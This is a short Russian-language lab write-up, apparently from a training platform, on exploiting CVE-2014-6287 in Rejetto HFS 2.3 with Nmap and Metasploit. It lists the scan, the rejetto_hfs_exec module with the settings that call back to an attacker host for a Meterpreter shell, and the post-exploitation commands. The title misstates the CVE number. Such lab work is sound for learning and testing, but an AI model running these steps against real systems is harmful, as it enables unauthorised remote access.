
Metasploit RCE на HFS 2.3 - CVE-2014-62
Metasploit RCE на HFS 2.3 - CVE-2014-62
🔖 Название проекта
> Удаленное выполнение кода через HTTP File Server (HFS 2.3)
⚙ Используемые инструменты • Kali Linux • Nmap • Metasploit • Цель: HFS 2.3 на Windows 7
🔐 Детали уязвимости • Название: CVE-2014-6287 • Тип: удаленное выполнение кода • Причина: непроверенный ввод в скриптах HFS • Воздействие: неаутентифицированный доступ к оболочке
🔍 Методология (пошагово)
🔹 Шаг 1: Сбор информации (Nmap)
• nmap -sV demo.ine.local (ip целевой машины)
• обнаружен открытый порт: 80
• сервис: rejetto HTTP file server 2.3

🔹 Шаг 2: Эксплуатация (Metasploit)
• Msfconsole
• Поиск HFS или rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
Эксплойт
🔹 Шаг 3: Пост-эксплуатация
После запуска вы получите сессию meterpreter используйте команду: shell
• whoami • ipconfig • dir

**